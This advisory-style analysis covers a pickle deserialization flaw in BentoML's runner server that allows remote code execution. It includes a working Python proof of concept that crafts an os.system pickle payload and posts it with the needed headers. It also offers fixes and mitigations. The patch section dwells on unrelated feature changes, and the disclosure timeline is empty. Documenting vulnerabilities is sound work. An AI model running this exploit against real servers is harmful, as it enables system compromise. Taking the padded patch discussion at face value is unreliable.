CVE-2025-32375: Insecure Deserialization in BentoML Runner Server Leads to RCE

Executive Summary

CVE-2025-32375 describes a critical vulnerability in BentoML's runner server, stemming from insecure deserialization. By crafting a malicious POST request with specific headers, an attacker can achieve Remote Code Execution (RCE) on the server, potentially leading to initial access, information disclosure, and complete system compromise. The vulnerability arises from the unsafe use of pickle.loads() on attacker-controlled data.

Technical Details

Affected Systems:

  • BentoML runner server

Affected Software Versions:

  • All versions prior to the fix.

Affected Components:

  • src/bentoml/_internal/server/runner_app.py
  • src/bentoml/_internal/runner/container.py
  • src/bentoml/_internal/runner/utils.py

The vulnerability lies within the request handling logic of the BentoML runner server. Specifically, the _deserialize_single_param function in src/bentoml/_internal/server/runner_app.py processes request headers such as Payload-Container, Payload-Meta, and Batch-Size, combining them with the request body to construct a Payload object. This Payload is then passed through a series of functions, ultimately leading to the execution of pickle.loads() on the data contained within the request body.

Root Cause Analysis

The root cause of CVE-2025-32375 is the insecure use of Python's pickle.loads() function. pickle is a powerful serialization library, but it is inherently unsafe when used to deserialize data from untrusted sources. This is because a malicious pickle stream can contain arbitrary code that will be executed during the deserialization process.
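
To make the danger concrete, here is a minimal, harmless illustration (a sketch, not the exploit itself): any object whose __reduce__ method returns a callable and its arguments will have that callable invoked the moment the bytes are unpickled.

    import pickle

    class RunsOnLoad:
        def __reduce__(self):
            # pickle will invoke print(...) during deserialization
            return (print, ("this executes inside pickle.loads()",))

    blob = pickle.dumps(RunsOnLoad())

    # Merely deserializing the bytes runs the embedded call; swapping print
    # for os.system is what turns this into remote code execution.
    pickle.loads(blob)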

The vulnerability occurs because the Payload-Container header determines which class's from_payload method is called. When Payload-Container is set to NdarrayContainer or PandasDataFrameContainer, and payload.meta["format"] is set to "default", the pickle.loads(payload.data) function is invoked. The payload.data is directly derived from the request body, which is controlled by the attacker.

Here's a breakdown of the vulnerable code paths:

  1. Request Handling: The _request_handler function in src/bentoml/_internal/server/runner_app.py is responsible for handling incoming requests.

    # src/bentoml/_internal/server/runner_app.py#L291-L298
    async def _request_handler(request: Request) -> Response:
        assert self._is_ready
    
        arg_num = int(request.headers["args-number"])
        r_: bytes = await request.body()
    
        if arg_num == 1:
            params: Params[t.Any] = _deserialize_single_param(request, r_)
    
  2. Deserialization: The _deserialize_single_param function extracts header values and the request body to create a Payload object.

    # src/bentoml/_internal/server/runner_app.py#L376-L393
    def _deserialize_single_param(request: Request, bs: bytes) -> Params[t.Any]:
        container = request.headers["Payload-Container"]
        meta = json.loads(request.headers["Payload-Meta"])
        batch_size = int(request.headers["Batch-Size"])
        kwarg_name = request.headers.get("Kwarg-Name")
        payload = Payload(
            data=bs,
            meta=meta,
            batch_size=batch_size,
            container=container,
        )
        if kwarg_name:
            d = {kwarg_name: payload}
            params: Params[t.Any] = Params(**d)
        else:
            params: Params[t.Any] = Params(payload)
    
        return params
    
  3. Inference: The infer function then processes the params object.

    # src/bentoml/_internal/server/runner_app.py#L303-L304
    try:
        payload = await infer(params)
    
  4. Payload Mapping: Inside infer, the params object's map function is called with AutoContainer.from_payload.

    # src/bentoml/_internal/server/runner_app.py#L278-L289
    async def infer(params: Params[t.Any]) -> Payload:
        params = params.map(AutoContainer.from_payload)
    
        try:
            ret = await runner_method.async_run(
                *params.args, **params.kwargs
            )
        except Exception:
            traceback.print_exc()
            raise
    
        return AutoContainer.to_payload(ret, 0)
    
  5. Container Selection: AutoContainer.from_payload determines the container class based on the Payload-Container header.

    # src/bentoml/_internal/runner/container.py#L710-L712
    def from_payload(cls, payload: Payload) -> t.Any:
        container_cls = DataContainerRegistry.find_by_name(payload.container)
        return container_cls.from_payload(payload)
    
  6. Unsafe Deserialization: Finally, the from_payload methods of NdarrayContainer and PandasDataFrameContainer call pickle.loads() if the "format" key in payload.meta is set to "default".

    # src/bentoml/_internal/runner/container.py#L411-L416
    def from_payload(
        cls,
        payload: Payload,
    ) -> ext.PdDataFrame:
        if payload.meta["format"] == "default":
            return pickle.loads(payload.data)
    
    # src/bentoml/_internal/runner/container.py#L306-L312
    def from_payload(
        cls,
        payload: Payload,
    ) -> ext.NpNDArray:
        format = payload.meta.get("format", "default")
        if format == "default":
            return pickle.loads(payload.data)
    

This direct deserialization of attacker-controlled data without proper sanitization is the core vulnerability.
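
Condensed, the chain above is roughly equivalent to the following simplified sketch (the variable names are illustrative stand-ins, not the literal BentoML code):

    import json
    import pickle

    # Stand-ins for the attacker-controlled parts of the HTTP request.
    request_headers = {
        "Payload-Container": "NdarrayContainer",
        "Payload-Meta": '{"format": "default"}',
    }
    request_body = pickle.dumps({"harmless": "example"})  # attacker supplies arbitrary bytes

    container = request_headers["Payload-Container"]
    meta = json.loads(request_headers["Payload-Meta"])

    # With this container and format, the selected from_payload() implementation
    # ends up handing the raw request body to pickle.loads().
    if container == "NdarrayContainer" and meta.get("format", "default") == "default":
        obj = pickle.loads(request_body)  # arbitrary code execution for a hostile payload
        print(obj)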

Patch Analysis

Multiple patches were applied to the BentoML codebase in this period. None of the patches analyzed below removes the insecure pickle.loads() call directly, but they are relevant to the surrounding attack surface and configuration of the framework. Here's an analysis of the relevant patches:

  1. feat: implement bento arguments (#5299)

    This patch introduces the ability to override values of the Image from bentofile.yaml and implements bento arguments. While not directly addressing the insecure deserialization, it adds a new feature that could potentially be misused if not handled carefully.

    File: src/_bentoml_impl/server/serving.py
    --- a/src/_bentoml_impl/server/serving.py
    +++ b/src/_bentoml_impl/server/serving.py
    @@ -92,6 +92,7 @@ def _get_server_socket(
     _SERVICE_WORKER_SCRIPT = "_bentoml_impl.worker.service"
     
     
    +@inject
     def create_dependency_watcher(
         bento_identifier: str,
         svc: AnyService,
    @@ -101,6 +102,7 @@ def create_dependency_watcher(
         scheduler: ResourceAllocator,
         working_dir: str | None = None,
         env: dict[str, str] | None = None,
    +    bento_args: dict[str, t.Any] = Provide[BentoMLContainer.bento_arguments],
     ) -> tuple[Watcher, CircusSocket, str]:
         from bentoml.serving import create_watcher
     
    @@ -116,6 +118,8 @@ def create_dependency_watcher(
             f"$(circus.sockets.{svc.name})",
             "--worker-id",
             "$(CIRCUS.WID)",
    +        "--args",
    +        json.dumps(bento_args),
         ]
     
         if worker_envs:
    @@ -306,6 +310,7 @@ def serve_http(
                 timeout_graceful_shutdown=timeout_graceful_shutdown,
             )
             timeout_args = ["--timeout", str(timeout)] if timeout else []
    +        bento_args = BentoMLContainer.bento_arguments.get()
     
             server_args = [
                 "-m",
    @@ -319,6 +324,8 @@ def serve_http(
                 str(backlog),
                 "--worker-id",
                 "$(CIRCUS.WID)",
    +            "--args",
    +            json.dumps(bento_args),
                 *ssl_args,
                 *timeouts_args,
                 *timeout_args,
    

    This code introduces the concept of bento_args, which are arguments passed to the BentoML service. These arguments are serialized as JSON and passed to the worker processes. While JSON serialization is generally safer than pickle, it's important to ensure that these arguments are properly validated and sanitized to prevent other types of vulnerabilities.

    The @inject decorator and Provide[BentoMLContainer.bento_arguments] indicate that these arguments are managed by the dependency injection system, allowing for flexible configuration and overriding of values.

  2. fix: remove start commands from CLI (#5303)

    This patch removes the start commands from the CLI and redirects them to internal modules. This change aims to simplify the CLI and improve the internal structure of BentoML.

    File: src/bentoml/_internal/container/frontend/dockerfile/entrypoint.sh
    --- a/src/bentoml/_internal/container/frontend/dockerfile/entrypoint.sh
    +++ b/src/bentoml/_internal/container/frontend/dockerfile/entrypoint.sh
    @@ -18,36 +18,39 @@ _main() {
     	# For backwards compatibility with the yatai<1.0.0, adapting the old "yatai" command to the new "start" command.
     	if [ "${#}" -gt 0 ] && [ "${1}" = 'python' ] && [ "${2}" = '-m' ] && { [ "${3}" = 'bentoml._internal.server.cli.runner' ] || [ "${3}" = "bentoml._internal.server.cli.api_server" ]; }; then # SC2235, use { } to avoid subshell overhead
     		if [ "${3}" = 'bentoml._internal.server.cli.runner' ]; then
    -			set -- bentoml start-runner-server "${@:4}"
    +			set -- python -m bentoml_cli._internal.start start-runner-server "${@:4}"
     		elif [ "${3}" = 'bentoml._internal.server.cli.api_server' ]; then
    -			set -- bentoml start-http-server "${@:4}"
    +			set -- python -m bentoml_cli._internal.start start-http-server "${@:4}"
     		fi
    +	# Redirect start-* commands to the internal modules.
    +	elif [ "${#}" -gt 0 ] && { [ "${1}" = 'start-http-server' ] || [ "${1}" = 'start-grpc-server' ] || [ "${1}" = 'start-runner-server' ]; }; then
    +		set -- python -m bentoml_cli._internal.start "${@:1}" "$BENTO_PATH"
     	# If no arg or first arg looks like a flag.
     	elif [[ "$#" -eq 0 ]] || [[ "${1:0:1}" =~ '-' ]]; then
     		# This is provided for backwards compatibility with places where user may have
     		# discover this easter egg and use it in their scripts to run the container.
     		if [[ -v BENTOML_SERVE_COMPONENT ]]; then
     			echo "\$BENTOML_SERVE_COMPONENT is set! Calling 'bentoml start-*' instead"
     			if [ "${BENTOML_SERVE_COMPONENT}" = 'http_server' ]; then
    -				set -- bentoml start-http-server "$@" "$BENTO_PATH"
    +				set -- python -m bentoml_cli._internal.start start-http-server "$@" "$BENTO_PATH"
     			elif [ "${BENTOML_SERVE_COMPONENT}" = 'grpc_server' ]; then
    -				set -- bentoml start-grpc-server "$@" "$BENTO_PATH"
    +				set -- python -m bentoml_cli._internal.start start-grpc-server "$@" "$BENTO_PATH"
     			elif [ "${BENTOML_SERVE_COMPONENT}" = 'runner' ]; then
    -				set -- bentoml start-runner-server "$@" "$BENTO_PATH"
    +				set -- python -m bentoml_cli._internal.start start-runner-server "$@" "$BENTO_PATH"
     			fi
     		else
     			set -- bentoml serve "$@" "$BENTO_PATH"
     		fi
     	fi
     	# Override the BENTOML_PORT if PORT env var is present. Used for Heroku and Yatai.
     	if [[ -v PORT ]]; then
     		echo "\$PORT is set! Overriding \$BENTOML_PORT with \$PORT ($PORT)"
     		export BENTOML_PORT=$PORT
     	fi
     	# Handle serve and start commands that is passed to the container.
     	# Assuming that serve and start commands are the first arguments
     	# Note that this is the recommended way going forward to run all bentoml containers.
    -	if [ "${#}" -gt 0 ] && { [ "${1}" = 'serve' ] || [ "${1}" = 'serve-http' ] || [ "${1}" = 'serve-grpc' ] || [ "${1}" = 'start-http-server' ] || [ "${1}" = 'start-grpc-server' ] || [ "${1}" = 'start-runner-server' ]; }; then
    +	if [ "${#}" -gt 0 ] && { [ "${1}" = 'serve' ] || [ "${1}" = 'serve-http' ] || [ "${1}" = 'serve-grpc' ]; }; then
     		exec bentoml "$@" "$BENTO_PATH"
     	else
     		# otherwise default to run whatever the command is
    

    This patch doesn't directly address the insecure deserialization vulnerability, but it changes how the server is started: redirecting the start-* commands to internal modules may reduce the exposed attack surface, or at least change the entry points available for exploitation.

  3. feat: make it possible to override values of Image from bentofile.yaml (#5298)

    This patch allows overriding values of the Image from bentofile.yaml. This change introduces more flexibility in configuring the BentoML environment but also requires careful validation to prevent malicious configurations.

    File: src/_bentoml_sdk/images.py
    --- a/src/_bentoml_sdk/images.py
    +++ b/src/_bentoml_sdk/images.py
    @@ -41,7 +41,8 @@
     class Image:
         """A class defining the environment requirements for bento."""
    
    -    base_image: str
    +    base_image: str = ""
    +    distro: str = "debian"
         python_version: str = DEFAULT_PYTHON_VERSION
         commands: t.List[str] = attrs.field(factory=list)
         lock_python_packages: bool = True
    @@ -243,7 +274,11 @@ def _freeze_python_requirements(
                 cwd=bento_fs.getsyspath(py_folder),
             )
         except subprocess.CalledProcessError as e:
    -        raise BentoMLException(f"Failed to lock PyPI packages: {e}") from None
    +        raise BentoMLException(
    +            "Failed to lock PyPI packages. Add `--debug` option to see more details.\n"
    +            "You see this error because you set `lock_packages=true` in the image config.\n"
    +            "Learn more at https://docs.bentoml.com/en/latest/reference/bentoml/bento-build-options.html#pypi-package-locking"
    +        ) from e
         locked_requirements = (  # uv doesn't preserve global option lines, add them here
             "\n".join(option.dumps() for option in requirements_file.options)
         )
    

    This patch modifies the Image class to allow setting the base image and distro. It also updates the error message when locking PyPI packages fails, providing more information to the user. While these changes don't directly address the insecure deserialization, they improve the configurability of BentoML and provide better error messages.

Theoretical Fixes:

Given the root cause, the primary fix would involve removing or replacing the insecure pickle.loads() call. Here are a few potential strategies:

  1. Use a Safe Serialization Format: Replace pickle with a safer serialization format like JSON or Protocol Buffers. This would require changing the Content-Type header and the corresponding deserialization logic.

  2. Input Validation and Sanitization: If pickle is necessary for some reason, implement strict input validation and sanitization. This could involve whitelisting allowed classes or data structures and rejecting any input that does not conform to the expected format (a restricted-unpickler sketch along these lines follows the theoretical patch below).

  3. Sandboxing: Execute the pickle.loads() call within a sandboxed environment with limited privileges. This would prevent the attacker from gaining full control of the system even if they are able to execute arbitrary code.

  4. Authentication and Authorization: Implement robust authentication and authorization mechanisms to ensure that only trusted users can send requests to the runner server.

A theoretical patch to src/bentoml/_internal/runner/container.py might look like this:

--- a/src/bentoml/_internal/runner/container.py
+++ b/src/bentoml/_internal/runner/container.py
@@ -303,6 +303,12 @@
     cls,
     payload: Payload,
 ) -> ext.NpNDArray:
-    format = payload.meta.get("format", "default")
-    if format == "default":
-        return pickle.loads(payload.data)
+    if payload.meta.get("format") == "default":
+        # Replace pickle.loads with a safer alternative, e.g., JSON
+        try:
+            import json
+            return json.loads(payload.data.decode('utf-8'))
+        except json.JSONDecodeError:
+            raise ValueError("Invalid JSON data")
+    else:
+        raise ValueError("Unsupported format")

This theoretical patch replaces pickle.loads with json.loads, requiring the client to send JSON-encoded data instead of pickled data, and adds error handling for invalid JSON and unsupported formats. Because JSON deserialization cannot execute code, this mitigates the RCE; a complete fix would also need to reconstruct the ndarray or DataFrame from the decoded JSON structure.
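
If pickle must be retained in the short term, strategy 2 (input validation) could be approximated with a restricted unpickler, following the pattern shown in the Python pickle documentation. This is a minimal sketch; the allow-list entries are illustrative assumptions rather than a vetted set for BentoML, and an allow-list narrows rather than eliminates the risk:

    import io
    import pickle

    # Hypothetical allow-list: only these module/name pairs may be resolved
    # while unpickling; everything else is rejected before it can run.
    _ALLOWED_GLOBALS = {
        ("numpy", "ndarray"),
        ("numpy", "dtype"),
        ("numpy.core.multiarray", "_reconstruct"),
    }

    class RestrictedUnpickler(pickle.Unpickler):
        def find_class(self, module, name):
            if (module, name) in _ALLOWED_GLOBALS:
                return super().find_class(module, name)
            raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

    def restricted_loads(data: bytes):
        return RestrictedUnpickler(io.BytesIO(data)).load()

Even with such an allow-list in place, replacing pickle entirely remains the stronger fix.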

Exploitation Techniques

An attacker can exploit CVE-2025-32375 by sending a crafted POST request to the BentoML runner server. The request must include the following headers:

  • args-number: 1
  • Content-Type: application/vnd.bentoml.pickled
  • Payload-Container: NdarrayContainer (or PandasDataFrameContainer)
  • Payload-Meta: {"format": "default"}
  • Batch-Size: -1

The request body should contain a malicious pickle payload that executes arbitrary code.

Here's a step-by-step Proof of Concept (PoC) example:

  1. Create a malicious pickle payload:

    import pickle
    import base64
    
    class RCE:
        def __reduce__(self):
            import os
            return (os.system, ('touch /tmp/pwned',)) # Replace with your desired command
    
    payload = pickle.dumps(RCE())
    payload_b64 = base64.b64encode(payload).decode()
    
    print(f"Pickle Payload (Base64 Encoded): {payload_b64}")
    

    This code creates a Python class RCE with a __reduce__ method that returns os.system and the touch /tmp/pwned command. pickle.dumps() serializes the object into a pickle payload, and base64.b64encode() encodes it in Base64 for easier transmission. (A static inspection of the resulting opcode stream is sketched after this walkthrough.)

  2. Send the crafted POST request:

    import pickle
    import requests
    
    url = "http://0.0.0.0:8888/"
    
    # Create a malicious pickle payload (same as above)
    class RCE:
        def __reduce__(self):
            import os
            return (os.system, ('touch /tmp/pwned',)) # Replace with your desired command
    
    payload = pickle.dumps(RCE())
    
    headers = {
        "args-number": "1",
        "Content-Type": "application/vnd.bentoml.pickled",
        "Payload-Container": "NdarrayContainer",
        "Payload-Meta": '{"format": "default"}',
        "Batch-Size": "-1",
    }
    
    response = requests.post(url, headers=headers, data=payload)
    
    print(response.status_code)
    print(response.content)
    

    This code sends a POST request to the BentoML runner server with the crafted headers and the malicious pickle payload in the request body. If the exploit is successful, the touch /tmp/pwned command will be executed on the server, creating a file named /tmp/pwned.
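
For completeness, the opcode stream of such a payload can also be inspected statically with the standard-library pickletools module, which shows, without executing anything, how the payload resolves os.system and then calls it:

    import pickle
    import pickletools

    class RCE:
        def __reduce__(self):
            import os
            return (os.system, ("touch /tmp/pwned",))

    payload = pickle.dumps(RCE())

    # pickletools.dis prints the opcode stream to stdout. For this payload it
    # contains a STACK_GLOBAL (or GLOBAL) opcode resolving os.system followed by
    # REDUCE, which calls it -- exactly what pickle.loads() would execute.
    pickletools.dis(payload)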

Attack Scenarios:

  • Remote Code Execution: An attacker can execute arbitrary code on the server, potentially gaining full control of the system.
  • Information Disclosure: An attacker can access sensitive data stored on the server, such as API keys, database credentials, and customer data.
  • Denial of Service: An attacker can crash the server by sending a malicious pickle payload that causes an exception.
  • Lateral Movement: If the server is part of a larger network, an attacker can use it as a stepping stone to gain access to other systems.

Real-World Impacts:

  • Compromised Machine Learning Models: An attacker could modify or replace machine learning models, leading to incorrect predictions or biased results.
  • Data Breach: An attacker could steal sensitive data used by the machine learning models, such as customer data or financial information.
  • Supply Chain Attacks: An attacker could inject malicious code into the BentoML deployment pipeline, compromising the entire machine learning supply chain.

Mitigation Strategies

To mitigate CVE-2025-32375, the following strategies are recommended:

  1. Upgrade BentoML: Upgrade to a release of BentoML that includes the fix for this vulnerability.

  2. Disable or Replace Pickle Deserialization: If possible, disable or replace the use of pickle.loads() in the runner server. Use a safer serialization format like JSON or Protocol Buffers instead (a pickle-free ndarray round trip is sketched after this list).

  3. Input Validation: Implement strict input validation to ensure that only trusted data is deserialized. Whitelist allowed classes or data structures and reject any input that does not conform to the expected format.

  4. Network Segmentation: Isolate the BentoML runner server from other systems on the network. This will limit the impact of a successful attack.

  5. Least Privilege: Run the BentoML runner server with the least privileges necessary. This will limit the attacker's ability to perform actions on the system.

  6. Web Application Firewall (WAF): Deploy a WAF to filter out malicious requests before they reach the BentoML runner server. The WAF can be configured to block requests with suspicious headers or payloads.

  7. Regular Security Audits: Conduct regular security audits of the BentoML deployment to identify and address any vulnerabilities.

  8. Monitor for Suspicious Activity: Implement monitoring and alerting to detect suspicious activity on the BentoML runner server. This could include unusual network traffic, unexpected process execution, or unauthorized access attempts.
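
To make mitigation 2 concrete, a pickle-free ndarray round trip could look like the following sketch. The helper names are hypothetical, and a real change would also have to update the client side of the runner protocol to send .npy bytes instead of pickles:

    import io
    import numpy as np

    def ndarray_to_bytes(arr: np.ndarray) -> bytes:
        # The .npy format carries dtype and shape without pickle for plain numeric dtypes.
        buf = io.BytesIO()
        np.save(buf, arr, allow_pickle=False)
        return buf.getvalue()

    def ndarray_from_bytes(data: bytes) -> np.ndarray:
        # allow_pickle=False rejects object arrays, so arbitrary pickled
        # objects can never be executed during deserialization.
        return np.load(io.BytesIO(data), allow_pickle=False)

    original = np.arange(6, dtype=np.float32).reshape(2, 3)
    restored = ndarray_from_bytes(ndarray_to_bytes(original))
    assert np.array_equal(original, restored)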

Configuration Changes:

  • If using a custom bentofile.yaml, ensure that the image configuration does not allow for arbitrary base images or distros.
  • Review and restrict the use of BentoML arguments to prevent malicious configurations.

Security Best Practices:

  • Follow the principle of least privilege when configuring the BentoML environment.
  • Keep all software components up to date with the latest security patches.
  • Implement strong authentication and authorization mechanisms.
  • Regularly review and update security policies and procedures.

Timeline of Discovery and Disclosure

  • Public Disclosure: CVE-2025-32375 was publicly disclosed.
